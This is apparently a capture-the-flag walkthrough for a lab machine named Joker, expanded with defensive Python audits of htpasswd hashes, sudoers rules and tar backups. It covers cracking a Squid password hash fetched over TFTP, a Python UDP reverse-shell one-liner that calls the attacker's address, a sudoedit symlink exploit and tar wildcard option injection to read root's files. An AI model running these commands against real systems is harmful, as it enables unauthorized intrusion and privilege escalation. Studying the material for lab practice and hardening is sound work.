Difficulty Rating:

Machine: Joker
OS: Linux
IP: 10.10.10.21

  • Nmap scan for TCP
$ nmap -A -sV -Pn 10.10.10.21 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 13:27 IST
Nmap scan report for 10.10.10.21
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
|   256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_  256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (EdDSA)
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.24 seconds
  • Nmap scan for UDP
$ sudo nmap -A -sV -Pn -sU 10.10.10.21 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 13:29 IST
Nmap scan report for 10.10.10.21
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE      VERSION
69/udp    open|filtered tftp
1234/udp  open|filtered search-agent
5355/udp  open|filtered llmnr
45685/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 1761/udp)
HOP RTT       ADDRESS
1   171.22 ms 10.10.14.1
2   171.31 ms 10.10.10.21

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1175.45 seconds
  • UDP port 69 (TFTP) looks interesting.
  • The website seems to be behind a Squid 3.5 proxy.
  • By default Squid's passwords file lives at /etc/squid3/passwords (on this box it is under /etc/squid/, as the tftp transfer shows).
  • TFTP lets us fetch that file directly:
$ tftp 10.10.10.21
tftp> get /etc/squid/passwords
Received 48 bytes in 0.2 seconds
  • The file is in htpasswd format: username, colon, password hash (the $apr1$ prefix marks Apache's MD5-crypt scheme):
$ cat passwords 
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0
  • Let's crack the hash with John the Ripper:
$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateseafood     (kalamari)
1g 0:00:02:51 DONE (2017-08-01 17:21) 0.005829g/s 43379p/s 43379c/s 43379C/s ihatesex!..ihateseabass
Use the "--show" option to display all of the cracked passwords reliably
Session completed
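As an added example (not part of the original writeup, and not Squid's or John's code), here is a small Python audit of an htpasswd-style passwords file like the one recovered above: it classifies each entry's hash scheme, and it re-implements the public md5crypt/apr1 construction with hashlib so that one candidate password can be checked offline. The sample line is the entry from the writeup; the scheme table and verdict strings are my own.

```python
"""Audit an htpasswd-style passwords file and verify a candidate against an
$apr1$ hash. Added example, not Squid's, Apache's or John's code."""
import hashlib
import hmac

# Sample input: the single line recovered from /etc/squid/passwords in the writeup.
SAMPLE_PASSWORDS_FILE = "kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0\n"

# (prefix, scheme name, reviewer's verdict); order matters for prefix matching.
SCHEMES = (
    ("$apr1$", "apr1 (Apache MD5-crypt)", "weak: 1000 MD5 rounds, tens of thousands of guesses/s per core"),
    ("$1$", "md5crypt", "weak: same construction as apr1"),
    ("{SHA}", "SHA-1 (base64, unsalted)", "weak: unsalted and fast"),
    ("$2y$", "bcrypt", "acceptable: adaptive cost factor"),
    ("$2a$", "bcrypt", "acceptable: adaptive cost factor"),
    ("$2b$", "bcrypt", "acceptable: adaptive cost factor"),
)

_ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Encode `count` 6-bit groups of `value`, least significant first (crypt(3) style)."""
    out = bytearray()
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5_crypt(password, salt, magic="$1$"):
    """md5crypt as in FreeBSD crypt-md5.c; magic "$apr1$" gives Apache's apr1 variant."""
    pw = password.encode()
    sl = salt.encode()[:8]          # crypt truncates the salt to 8 characters
    mg = magic.encode()
    ctx = hashlib.md5(pw + mg + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    pl = len(pw)
    while pl > 0:                   # feed len(pw) bytes of the alternate sum
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                        # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):           # fixed 1000-round stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    enc = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (mg + sl + b"$" + enc).decode()


def verify_apr1(password, stored):
    """True if `password` matches an "$apr1$salt$hash" string (constant-time compare)."""
    if not stored.startswith("$apr1$"):
        raise ValueError("not an apr1 hash")
    salt = stored[len("$apr1$"):].split("$", 1)[0]
    return hmac.compare_digest(md5_crypt(password, salt, "$apr1$"), stored)


def classify(hash_string):
    """Map a stored hash to (scheme name, verdict) by its prefix."""
    for prefix, name, verdict in SCHEMES:
        if hash_string.startswith(prefix):
            return name, verdict
    return "crypt(3) DES or unknown", "weak/unknown: review"


def audit(text):
    """Parse user:hash lines and return [(user, scheme, verdict), ...]."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, stored = line.split(":", 1)
        rows.append((user, *classify(stored)))
    return rows


if __name__ == "__main__":
    for user, scheme, verdict in audit(SAMPLE_PASSWORDS_FILE):
        print(f"{user}: {scheme} -> {verdict}")
    stored = SAMPLE_PASSWORDS_FILE.split(":", 1)[1].strip()
    print("candidate matches:", verify_apr1("ihateseafood", stored))
```

The audit is what a reviewer of a proxy deployment should run: a file that TFTP can serve to anyone, holding a fast, 1000-round MD5 hash, is two findings at once. Moving the hash to bcrypt would not fix the exposure, but it would turn John's 43k guesses per second into a few hundred.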
  • Configure Firefox to use the proxy at 10.10.10.21, port 3128.
  • Authenticate to the proxy with username kalamari and password ihateseafood.
  • Visit http://127.0.0.1

Note: Browsing to http://10.10.10.21 through the proxy does not reach the web server; it runs on 127.0.0.1, so request http://127.0.0.1 via the proxy instead.

  • Run dirb against 127.0.0.1 through the authenticated proxy:
$ dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug  2 00:47:00 2017
URL_BASE: http://127.0.0.1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.21:3128
PROXY AUTHORIZATION: kalamari:ihateseafood

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/console (CODE:200|SIZE:1479)
==> DIRECTORY: http://127.0.0.1/list/

---- Entering directory: http://127.0.0.1/list/ ----
+ http://127.0.0.1/list/0 (CODE:200|SIZE:630)
+ http://127.0.0.1/list/00 (CODE:200|SIZE:630)
+ http://127.0.0.1/list/01 (CODE:301|SIZE:251)
+ http://127.0.0.1/list/1 (CODE:301|SIZE:251)

-----------------
END_TIME: Wed Aug  2 01:18:45 2017
DOWNLOADED: 9224 - FOUND: 5

Note: The reverse shell to joker must use UDP; the console freezes when you try a TCP connection.

  • On your machine, start a socat listener on a UDP port:
$ socat file:`tty`,echo=0,raw udp-listen:4444
  • In the input box of http://127.0.0.1/console, enter the following one-liner (10.10.15.16 is the attacker's VPN address; use your own):
import os,pty,socket;s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(("10.10.15.16", 4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE",'/dev/null');pty.spawn(["/bin/bash", "-i"]);s.close()

Note: socat is used instead of netcat because socat allocates a proper tty for the session, which netcat does not.
  • A shell arrives on your terminal.
  • Run sudo -l and you will see:
(alekos) NOPASSWD sudoedit /var/www/*/*/layout.html
  • There is a known sudoedit vulnerability when the rule's path contains wildcards (two of them here):
    • https://www.exploit-db.com/exploits/37710/
  • To exploit it, create a directory inside /var/www/testing and place a symlink named layout.html in it:
/var/www/testing:$ mkdir dir
/var/www/testing:$ cd dir
/var/www/testing/dir:$ ln -s /home/alekos/authorized_keys ./layout.html
  • The symbolic link now points at alekos's authorized_keys:
/var/www/testing/dir:$ ls -l
layout.html -> /home/alekos/authorized_keys
  • Run sudoedit on the link:
$ sudoedit -u alekos /var/www/testing/dir/layout.html
  • nano opens as the editor.
  • On your machine generate an SSH key pair and paste the contents of id_rsa.pub into the editor.
  • Save the file.
  • Connect via ssh
$ ssh -i id_rsa alekos@10.10.10.21

Note: If you get the error sign_and_send_pubkey: signing failed: agent refused operation, add the private key to your agent by running ssh-add on your machine.
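The rule that made this possible is the interesting part for a defender. As an added example (not sudo's code and not part of the original writeup), here is a small Python check that reads sudoers-style lines and flags sudoedit rules whose path contains glob characters, rating a wildcard in a directory component as the serious case: the RunAs target's directory choice is then up to the calling user, which is exactly what the symlink trick above relies on. The sample fragment is constructed; its first rule reproduces the one seen in sudo -l, with a placeholder user name.

```python
"""Flag sudoedit rules with wildcards in their path. Added example for this
writeup; it is not sudo's own parser and handles only simple one-line rules."""
import re

# Constructed sample. The first rule mirrors the writeup's sudo -l output;
# "webuser" is a placeholder for whatever account the web console ran as.
SAMPLE_SUDOERS = """\
# constructed sudoers fragment
webuser ALL=(alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html
www-data ALL=(root) NOPASSWD: sudoedit /etc/apache2/sites-available/*.conf
deploy ALL=(root) sudoedit /etc/nginx/nginx.conf
"""

GLOB_CHARS = set("*?[")

# user host=(runas) [TAG: ...] command args   (a subset of sudoers syntax)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>.+)$"
)


def parse_rules(text):
    """Return a list of {user, runas, cmd} dicts for the rules we can parse."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"user": m["user"], "runas": m["runas"] or "root", "cmd": m["cmd"]})
    return rules


def wildcard_risk(path):
    """Rate one sudoedit path argument: (level, reason)."""
    parts = path.split("/")
    dirs, leaf = parts[:-1], parts[-1]
    if any(GLOB_CHARS & set(p) for p in dirs):
        return "high", "wildcard in a directory component: caller can supply a directory holding a symlink"
    if GLOB_CHARS & set(leaf):
        return "medium", "wildcard in the file name: any matching file in a fixed directory is editable"
    return "ok", "fixed path"


def audit_sudoers(text):
    """Return [(user, runas, path, level, reason), ...] for every sudoedit path."""
    findings = []
    for rule in parse_rules(text):
        argv = rule["cmd"].split()
        if not argv or argv[0] != "sudoedit":
            continue
        for path in argv[1:]:
            level, reason = wildcard_risk(path)
            findings.append((rule["user"], rule["runas"], path, level, reason))
    return findings


if __name__ == "__main__":
    for user, runas, path, level, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{level:6}] {user} -> ({runas}) sudoedit {path}: {reason}")
```

The fix on the sudoers side is an explicit path per file that really needs editing, or a dedicated group-writable file with no sudo involved; a rule whose directory is chosen by the caller cannot be made safe by the file name alone.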

  • User owned.
  • To own root, look at the backup directory: it contains .tar files.
  • They are backups of /home/alekos/development.
  • tar, run over a wildcard, is subject to the trick described here:

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

  • Create two files named --checkpoint=1 and --checkpoint-action=exec=sh shell.sh, plus the payload script shell.sh.
  • This was my payload:
#!/bin/bash

cat /root/root.txt > /home/alekos/pass.txt
chmod +r /home/alekos/pass.txt
  • Wait for the backup job to run (around 3-5 minutes).
  • Afterwards a file named pass.txt appears in /home/alekos/:
alekos@joker:~$ ls
backup  development  pass.txt  user.txt
alekos@joker:~$ cat pass.txt
XXXXXX
User and Root owned!!
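The root step works because the backup job hands a shell glob to tar and the shell turns file names starting with "-" into tar options. As an added example (not the box's backup script and not part of the original writeup), the following Python shows both halves of the defensive picture: a check that lists the names in a directory a `*` glob would pass to tar as options, and a backup routine built on Python's tarfile module, which treats every name as data. The directory layout is constructed inside a temporary directory and mimics the file names used above. A job that must stay in shell should write `tar -cf out.tar -- *` or, better, `tar -cf out.tar -C /home/alekos/development .`, so that no entry is ever parsed as an option.

```python
"""Back up a directory without letting file names become tar options.
Added example for this writeup; not the box's cron job."""
import os
import tarfile
import tempfile


def option_like_names(directory):
    """Names in `directory` that an unquoted `*` would hand to tar as options."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def safe_backup(src_dir, archive_path):
    """Archive every entry of src_dir with tarfile; names are never parsed as
    options here. Returns the member names found in the finished archive."""
    with tarfile.open(archive_path, "w:gz") as tar:
        for name in sorted(os.listdir(src_dir)):
            tar.add(os.path.join(src_dir, name), arcname=name)
    with tarfile.open(archive_path, "r:gz") as tar:
        return sorted(tar.getnames())


def demo():
    """Build a constructed 'development' directory, list the hazardous names,
    and back it up. Returns (hazards, archived member names)."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "development")
    os.mkdir(src)
    # Constructed files: one ordinary, two whose names look like tar options,
    # and the script such names would point tar at.
    for name in ("notes.txt", "--checkpoint=1",
                 "--checkpoint-action=exec=sh shell.sh", "shell.sh"):
        with open(os.path.join(src, name), "w") as f:
            f.write("constructed sample\n")
    hazards = option_like_names(src)
    members = safe_backup(src, os.path.join(work, "dev-backup.tar.gz"))
    return hazards, members


if __name__ == "__main__":
    hazards, members = demo()
    print("names a glob would turn into tar options:", hazards)
    print("archived as plain members:", members)
```

Running the check from the same cron job (and refusing to back up, or alerting, when it returns anything) is a cheap detection for exactly this staging step; the tarfile version removes the problem instead.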

Share the fun!